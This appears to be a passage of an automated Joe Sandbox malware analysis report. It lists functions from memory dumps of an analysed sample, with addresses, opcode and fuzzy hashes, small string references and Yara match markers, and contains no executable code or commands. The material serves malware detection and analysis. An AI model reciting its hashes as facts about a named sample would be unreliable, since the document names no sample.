Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 339154fa1cfddadd90d881530bea000473b007e6d4d9b6b0d4b5d241d8c7b9fe
Instruction ID: eca770e56d0386bd63284094e5d531240b21c7d4fce3f130310a9fe7d68077da
Opcode Fuzzy Hash: 339154fa1cfddadd90d881530bea000473b007e6d4d9b6b0d4b5d241d8c7b9fe
Instruction Fuzzy Hash: FC617CB4A00B018FD724CF1AC5C1A12F7F1BF8C6147508A1EDA9A8BB56D374F881CBA1

Function 007701D3 Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?), ref: 007701DE

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 1bc48875e9dfceb395c79907cb983bae23a199a672069c8a55ce7d3834fcc3f4
Instruction ID: 01bb880e1e5960c41815285d5d8f9ecab4c73d7f8d4595831a625895f35329e6
Opcode Fuzzy Hash: 1bc48875e9dfceb395c79907cb983bae23a199a672069c8a55ce7d3834fcc3f4
Instruction Fuzzy Hash: 9C3171B9A00210CBDB24CF28D845A2273F1FF69354B244529E949CB351E77AA912CB85

Function 00754277 Relevance: 1.5, Strings: 1, Instructions: 261COMMON

Download Yara Rule

Strings

,, xrefs: 007543C3

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: a5b81c444e34c86b6962257dadb8900051aacf2b5b032a1f31b2fa0c4b4c73c0
Instruction ID: 68ee103cdf45f40dc9668fb8d3cfdf050b875f758beeceaa455c7a0aa4a287b4
Opcode Fuzzy Hash: a5b81c444e34c86b6962257dadb8900051aacf2b5b032a1f31b2fa0c4b4c73c0
Instruction Fuzzy Hash: C0B16B7120C382AFD315CF68C84469EBBE0AFA5308F444A5DF99497382D375D968CB92

Function 00414010 Relevance: 1.5, Strings: 1, Instructions: 261COMMON

Download Yara Rule

Strings

,, xrefs: 0041415C

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: a5b81c444e34c86b6962257dadb8900051aacf2b5b032a1f31b2fa0c4b4c73c0
Instruction ID: 0576207b7c5791bcf20e3c08151accda47f25c26c9c4f51806dbe2c9b0ecc148
Opcode Fuzzy Hash: a5b81c444e34c86b6962257dadb8900051aacf2b5b032a1f31b2fa0c4b4c73c0
Instruction Fuzzy Hash: AEB158712093829FD314CF68C88469BBFE0AFA9304F444A5EF59497382C375DA58CB97

Function 007873A2 Relevance: 1.4, Strings: 1, Instructions: 199COMMON

Download Yara Rule

Strings

3o&2, xrefs: 007874E6

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: 3o&2
API String ID: 0-2337855210
Opcode ID: bbc239f4c982273b843113d3e3da0bf30b61a73b8a408af9096c8ca30da1d05a
Instruction ID: b73a99bd4b794d6acab8fc545ba0bf2785919d0eaf565bfaa4cc060a83f74771
Opcode Fuzzy Hash: bbc239f4c982273b843113d3e3da0bf30b61a73b8a408af9096c8ca30da1d05a
Instruction Fuzzy Hash: D28125B1604B408FC728CF29C490A12FBF2BF58304755896ED99A8BB62D735F906CF51

Function 0044713B Relevance: 1.4, Strings: 1, Instructions: 199COMMON

Download Yara Rule

Strings

3o&2, xrefs: 0044727F

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID:
String ID: 3o&2
API String ID: 0-2337855210
Opcode ID: bbc239f4c982273b843113d3e3da0bf30b61a73b8a408af9096c8ca30da1d05a
Instruction ID: d6abc7cf25ee756fbeedf139460a4e9ce8398679d14e182d15b69fc0e51e31e4
Opcode Fuzzy Hash: bbc239f4c982273b843113d3e3da0bf30b61a73b8a408af9096c8ca30da1d05a
Instruction Fuzzy Hash: 658146B1604B408FD328CF2AD480A12BBF1FF48304B55896ED49A8BB62D735F806CF94

Function 0079E1C3 Relevance: 1.4, Strings: 1, Instructions: 120COMMON

Download Yara Rule

Strings

H&K, xrefs: 0079E31A

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: H&K
API String ID: 0-2736266838
Opcode ID: 6a979620c927fcf16c45129344ff7fe4fbe2e238dd9dfb9d615f58663d22c8ba
Instruction ID: df35d5c8ce3c688a415575d5f47f57a6a956fedf93e9c705b798b1dfeb7a0b06
Opcode Fuzzy Hash: 6a979620c927fcf16c45129344ff7fe4fbe2e238dd9dfb9d615f58663d22c8ba
Instruction Fuzzy Hash: 93511AB4905B018FC368CF1AD190912FBE2BF9C7143558A6ED49A8BB61D770F885CF94

Function 0079ED50 Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

(`&2, xrefs: 0079ED87

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: (`&2
API String ID: 0-119292233
Opcode ID: 679fb0d24ba7ba67619b139a73fac3bb2566138ae30a3bea7804ab5c370cd933
Instruction ID: b129ea999a82121c0ccefb6e1558ac11312568a4a3cf206ad25981b6fb94814d
Opcode Fuzzy Hash: 679fb0d24ba7ba67619b139a73fac3bb2566138ae30a3bea7804ab5c370cd933
Instruction Fuzzy Hash: 075141B4500B009FD328CF1AC580A02FBF2BF99714B65CA5DD59A8B765D371F8468F90

Function 0076B57F Relevance: 1.3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

Strings

4jMR, xrefs: 0076B686

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: 4jMR
API String ID: 0-3690987404
Opcode ID: fef2cceeb1af838388804306cd289e79e52940f3a641ff80a280bca76d8dfa1c
Instruction ID: 98156dc40857ad6eaa6ba74c3ae1bba89fa2049a47174a4f313e8aa0d6aefbdd
Opcode Fuzzy Hash: fef2cceeb1af838388804306cd289e79e52940f3a641ff80a280bca76d8dfa1c
Instruction Fuzzy Hash: 184149B4A01B019FC364CF2AC590A12FBE1FF9C3107548A2ED89A87B51D731B955CF90

Function 0079A819 Relevance: 1.3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

3gI\, xrefs: 0079A839

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: 3gI\
API String ID: 0-3441736805
Opcode ID: a10172cc4732a6f13e2fd9623ba7c325c2f353568c5f16fb1ca67b06860e7cda
Instruction ID: b761a11be0c797fafb106b638340d9f0650b8d83d3e2f51a442487884865cf8a
Opcode Fuzzy Hash: a10172cc4732a6f13e2fd9623ba7c325c2f353568c5f16fb1ca67b06860e7cda
Instruction Fuzzy Hash: EC3198B4A04B019FD368CF1AD991A12B7F1BF4C710B518A2E959A8BB61D730F851CF94

Function 007684B8 Relevance: 1.3, Strings: 1, Instructions: 20COMMON

Download Yara Rule

Strings

K|O, xrefs: 007684D9

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: K|O
API String ID: 0-2477216374
Opcode ID: 6b80925595f8851589f554bbc425f372f9e78259ef9f0d2fe5de378217e60098
Instruction ID: 49f98f741f36f7aa0e18486a2ee85077bce91632d30e9ea74627d8092daf716d
Opcode Fuzzy Hash: 6b80925595f8851589f554bbc425f372f9e78259ef9f0d2fe5de378217e60098
Instruction Fuzzy Hash: 12D017B4A04200CFC214CF14DC42835B3F5EB9B301708A928E886D3710D635E8118B59

Function 00428251 Relevance: 1.3, Strings: 1, Instructions: 20COMMON

Download Yara Rule

Strings

K|O, xrefs: 00428272

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID:
String ID: K|O
API String ID: 0-2477216374
Opcode ID: 6b80925595f8851589f554bbc425f372f9e78259ef9f0d2fe5de378217e60098
Instruction ID: b59c47607664b6544a60877bc7516822cfd30a3f189f066d2476fbec6a67df89
Opcode Fuzzy Hash: 6b80925595f8851589f554bbc425f372f9e78259ef9f0d2fe5de378217e60098
Instruction Fuzzy Hash: DBD05EB8A04200CFD354CF14EC42836B7F5EB9B301718A93DE886D3710E774E8118B59

Function 007706E7 Relevance: 1.3, Strings: 1, Instructions: 13COMMON

Download Yara Rule

Strings

^$D, xrefs: 007706F0

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: ^$D
API String ID: 0-423280263
Opcode ID: 7c9c3f3ae1419673d230a1f9cea45614257b821118d2785676d3f022877e39fe
Instruction ID: 30574c42be3a6402cd9e31ad3b50b12f3f20469ce1f46a65f84ab774e50c2c59
Opcode Fuzzy Hash: 7c9c3f3ae1419673d230a1f9cea45614257b821118d2785676d3f022877e39fe
Instruction Fuzzy Hash: B6C08CB8E0414087CA04CF50BC865326238E603206B083434D442D7302E560E92C855F

Function 0076AA6C Relevance: 1.3, Strings: 1, Instructions: 12COMMON

Download Yara Rule

Strings

R/, xrefs: 0076AA75

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: R/
API String ID: 0-2776246441
Opcode ID: 65de0810244cdfdf2d9cff229ee3a6e0208ae59cd50b90e2a905ad65569060d5
Instruction ID: b28b00363e873bf88c49726dde9278a54832c0c2c5a173fdd46d50574363d250
Opcode Fuzzy Hash: 65de0810244cdfdf2d9cff229ee3a6e0208ae59cd50b90e2a905ad65569060d5
Instruction Fuzzy Hash: 7FC04C74E44500878258CF19E9514B1F2F8AF5B608B087539C14EE3661E5A0E811890D

Function 00785B59 Relevance: 1.3, Strings: 1, Instructions: 12COMMON

Download Yara Rule

Strings

]K,*, xrefs: 00785B64

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID: ]K,*
API String ID: 0-2254882874
Opcode ID: c0f1e40f443cd1e89f9c201157bd2e71533254b5abe3422205271cd7d55f525d
Instruction ID: 26d8d8b49339b0d1818f8f05f56763a579560b8806c851c77e10214188efc9a0
Opcode Fuzzy Hash: c0f1e40f443cd1e89f9c201157bd2e71533254b5abe3422205271cd7d55f525d
Instruction Fuzzy Hash: 18C04C2AA845008B82488E04E891575A2AB578B119716A528842ED3751C568E8464619

Function 00461236 Relevance: 1.3, Strings: 1, Instructions: 11COMMON

Download Yara Rule

Strings

RVM, xrefs: 00461238

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID:
String ID: RVM
API String ID: 0-1962271795
Opcode ID: 77c8bb608b32287787632f990681950136b2df37f6e20520d7aecf1e172089cd
Instruction ID: 2db382b4cc1ef5bf6413c93076c2ea7b0a98a39d0b4910d3df9628e0ab7ade85
Opcode Fuzzy Hash: 77c8bb608b32287787632f990681950136b2df37f6e20520d7aecf1e172089cd
Instruction Fuzzy Hash: 29C09234E782048B87CCCF24EC50539B2BBEB8F204B14F82C9806A3216DA20D41A874C

Function 00461234 Relevance: 1.3, Strings: 1, Instructions: 11COMMON

Download Yara Rule

Strings

RVM, xrefs: 00461238

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID:
String ID: RVM
API String ID: 0-1962271795
Opcode ID: 5e438a76934ced849d3968a9d5bd670c19a29a4fa8446551b11d9bb56b037ed3
Instruction ID: dc77a5b58ba04a1cf7016cefb89a4147ef0f2d738d980d1c8ce98e78831909e2
Opcode Fuzzy Hash: 5e438a76934ced849d3968a9d5bd670c19a29a4fa8446551b11d9bb56b037ed3
Instruction Fuzzy Hash: 29C09B34D7810487878CCF50D8504397377DB8F304B54F51D940277215D6209417974D

Function 0075EA27 Relevance: .8, Instructions: 821COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a44fb106eb77a9adfc478ba5588ddc56b2c1b9d42368a73c70d55fa822d6df81
Instruction ID: 4b1fb578f8daaf0f5cdb3d99a3b55e5a0a012dd64d28024dfcaccbaa127774f3
Opcode Fuzzy Hash: a44fb106eb77a9adfc478ba5588ddc56b2c1b9d42368a73c70d55fa822d6df81
Instruction Fuzzy Hash: 0972832010D3D09EC712CB79A8600F27FF9556B20134955BBD4E58B2A3F1F98E4AE76B

Function 0075CF97 Relevance: .8, Instructions: 782COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e695d8046e2c820b9f055a0b63dfda3fbbfd7c58448e908bd0e02fa06080caa
Instruction ID: 83346b29be69e45e61c00cbe50c21f4efba6af99a7de97089931604cd0842a20
Opcode Fuzzy Hash: 0e695d8046e2c820b9f055a0b63dfda3fbbfd7c58448e908bd0e02fa06080caa
Instruction Fuzzy Hash: 9742B431608711CBC734DF18C8506BAB3E1FFD4316F198A2DD99687281E7B9AC5AC786

Function 007513B7 Relevance: .7, Instructions: 673COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 518262974723b8af9186f5de7301f16f5eb9ca3e4ded69a5b5a7b2a7443b0a8d
Instruction ID: c3e27be7d266c0d35973ddfdc31c2f44da1d4d18c3a529c32b8a929f9d5a48c2
Opcode Fuzzy Hash: 518262974723b8af9186f5de7301f16f5eb9ca3e4ded69a5b5a7b2a7443b0a8d
Instruction Fuzzy Hash: 9E528B71514B418FC368CF28C5906AAB7F1FF45312B948A2DD9978BB90E7B9F809CB04

Function 00411150 Relevance: .7, Instructions: 673COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63947940f11ef17cb9f98d786b41c7fb0f3d2269e8bc3fa7cb8298bfb83707f7
Instruction ID: ab6e995e453958345e0e6fbec0cd8d5bdc2524449e0217ba8dbbd45986db72e4
Opcode Fuzzy Hash: 63947940f11ef17cb9f98d786b41c7fb0f3d2269e8bc3fa7cb8298bfb83707f7
Instruction Fuzzy Hash: 8A526B71614B118FC328CF29C9905AAB7F1FF45310B548A2ED6A787BA0D779F885CB18

Function 00766231 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67a567747c5a31d6d636e4a88990dca5ec50e4726d7d06d702b406587c10bc98
Instruction ID: bc4683a4f5bc600dbaa6d6b6f23876dabd48db94026aac92b9e1cce763bdb04e
Opcode Fuzzy Hash: 67a567747c5a31d6d636e4a88990dca5ec50e4726d7d06d702b406587c10bc98
Instruction Fuzzy Hash: 1D624FB4A05B019FD368CF2AD190A52FBF1BF8C310B51896ED59A8BB61D730B855CF84

Function 0075E2D7 Relevance: .6, Instructions: 585COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e29aaec83d1cf96aba9ffdf0fa431d4446ccc34a57cf061c7d8fc03a3e21b8a7
Instruction ID: 296b9d2b5c0052f45e620512ae14120dfe0455c3611c6b7bd267f9b640ba0af0
Opcode Fuzzy Hash: e29aaec83d1cf96aba9ffdf0fa431d4446ccc34a57cf061c7d8fc03a3e21b8a7
Instruction Fuzzy Hash: 1D22093010D7C18EC716CF3998904A1BFF56E6F20030981BAD4E58B767E6F4DA4ADB66

Function 0041E070 Relevance: .6, Instructions: 585COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee4152d8412052514cb8e699d0ce9fdf164d5b48180334c656f3b6e8465739a3
Instruction ID: 3707816d4a83eb69f983d7d14420defe697cf65fae43e46f14d57367a56d1757
Opcode Fuzzy Hash: ee4152d8412052514cb8e699d0ce9fdf164d5b48180334c656f3b6e8465739a3
Instruction Fuzzy Hash: A922293010C7C19EC712CF7A98904E27FF55A6F20034881BAD4E58B767E5F4DA46EB6A

Function 00753B87 Relevance: .6, Instructions: 584COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a323ebe256a47780d1182d1bb7c9de9dcc56aa276167cb78b6f4dda923d2f7a
Instruction ID: e35cec23dc74cbaffc07cedb07f5cd63151d4c60359f4fae5b9d9e8eb2bb490d
Opcode Fuzzy Hash: 5a323ebe256a47780d1182d1bb7c9de9dcc56aa276167cb78b6f4dda923d2f7a
Instruction Fuzzy Hash: D7221A366087018FD714CF28C88165AFBE2FFD8304F198A6DE9988B351E6B8DC85C781

Function 00772B97 Relevance: .5, Instructions: 505COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07ccffb6507f87645d439987679df5b5294a5698ebc24ecee5e6ae43eb812c2a
Instruction ID: edad1a0df0122d10f599dea5aa17dbc1d91551256b2b4eaac679a1fb17e6727b
Opcode Fuzzy Hash: 07ccffb6507f87645d439987679df5b5294a5698ebc24ecee5e6ae43eb812c2a
Instruction Fuzzy Hash: B402C1B49087418BC724CF1AC481A5BFBF1BFD9354F54CA2EE8988B365E3349946CB52

Function 00772B94 Relevance: .5, Instructions: 502COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea0bd9f23c0b0f1b8d704f6470daf92e578affe1e157f63aef26ad987043be6f
Instruction ID: e4961b2fa2d2da2fece6e46bdc9b582f6540decfecb7ea73e7ba200fd32f9b85
Opcode Fuzzy Hash: ea0bd9f23c0b0f1b8d704f6470daf92e578affe1e157f63aef26ad987043be6f
Instruction Fuzzy Hash: AD02C1B49087418BC724CF1AC480A5BFBF1BFD9354F54CA2EE9988B365E3349946CB52

Function 00783967 Relevance: .4, Instructions: 446COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c528a3a0163b15f6fab3d884fe38cbc7b85b31157a10f38650bd450b5c7fd58c
Instruction ID: 58d29e592165e2ef4405942dd4db6fac4f6953b1bca7cca2701fd883b6ac06e0
Opcode Fuzzy Hash: c528a3a0163b15f6fab3d884fe38cbc7b85b31157a10f38650bd450b5c7fd58c
Instruction Fuzzy Hash: 6AF167756106408FD328DF69EC91A3277F1FFA8310745992EE54ACB7A0E738E980CB59

Function 00787FB7 Relevance: .4, Instructions: 444COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e42e9176ace4f576f45a39983e36eb24fee9826312d9b7d0a3f9668a88e916a8
Instruction ID: 7227d626617b40db68c34610b78b311cdb5691715aa52f70a3394fe104659cd7
Opcode Fuzzy Hash: e42e9176ace4f576f45a39983e36eb24fee9826312d9b7d0a3f9668a88e916a8
Instruction Fuzzy Hash: EF02DFB4900B008FC768CF2AC590A22B7F2FF99314755895ED88A8BB61E775F842CF54

Function 007688E7 Relevance: .4, Instructions: 415COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8d577e621c652428fb8c05bcd442d398805f75c8e554628e2402797a48c4819
Instruction ID: fce33c302bf67f90876e89c57f3909b3df8eced0b082f2f104c9d843830eb977
Opcode Fuzzy Hash: b8d577e621c652428fb8c05bcd442d398805f75c8e554628e2402797a48c4819
Instruction Fuzzy Hash: 5E022670508AD05FC701CF79AC541E67FF1AB5B200B0481BAD4D16B3A3E6E88666DF6B

Function 00799497 Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28c992de603dad5f73954aa0d98fb999d2d1cb9b4fcd375f0403140690be0dec
Instruction ID: bc5ee019563100a45926b75e887541eed8dd7be81b2e77ec12397ea852268577
Opcode Fuzzy Hash: 28c992de603dad5f73954aa0d98fb999d2d1cb9b4fcd375f0403140690be0dec
Instruction Fuzzy Hash: 4FB1C468120644AAE314DF65EC9276233B1FF28709B40593AE64DCB2B0EB3C95C5D7DE

Function 00459230 Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052654786.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2052654786.0000000000483000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_current[1].jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28c992de603dad5f73954aa0d98fb999d2d1cb9b4fcd375f0403140690be0dec
Instruction ID: 72aa6f258cbc62f836facec4ea08af134b1eab1886fffa6e3e10294dd4a389f7
Opcode Fuzzy Hash: 28c992de603dad5f73954aa0d98fb999d2d1cb9b4fcd375f0403140690be0dec
Instruction Fuzzy Hash: 96B1C5681206449AE314DF65EC9276233B1FF28309B40593AE64DCB2B0EB3C95C5D7DE

Function 0079A0F7 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6daa4319d2c3b60080092af993f8aabf2a6b097b767084a0570134e28cde6741
Instruction ID: e9b524af93ef8b1d348a767f7a0da59f907f2515b3dad09b3109f18da1d5df2d
Opcode Fuzzy Hash: 6daa4319d2c3b60080092af993f8aabf2a6b097b767084a0570134e28cde6741
Instruction Fuzzy Hash: D59188B1A002198FDF18CF68D8A1BAABBF1FB49304F14816DD8199B396D339D940CBD5

Function 00777E68 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1749d59758dbdf3fafa031541ca9f6e518e224b0cc89a4c9fdf2adb603e5ac3e
Instruction ID: fc7aac950dd34ed0d984bd1a6ecbc1fa28735be712a98684470f32d511c2d274
Opcode Fuzzy Hash: 1749d59758dbdf3fafa031541ca9f6e518e224b0cc89a4c9fdf2adb603e5ac3e
Instruction Fuzzy Hash: F991A70451D6D09EDB068BBE3CA10F23FF1457B251B4914ABD0EC8A2B3E04862CEE76D

Function 0079F6BD Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_current[1].jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76d2c34ee9a5f676f1ccd8ff1aeae793cfd55b90770c6cd132f118f458f505c3
Instruction ID: 9497b939ce81a73f86b20f1715951e663453f3b48b22bde6fd15902504d614a3
Opcode Fuzzy Hash: 76d2c34ee9a5f676f1ccd8ff1aeae793cfd55b90770c6cd132f118f458f505c3
Instruction Fuzzy Hash: F1918DB4900B00CFD768CF2AD590912FBE1FF99310765C96ED88A9BB61D631B846CF54

Function 0077D187 Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false

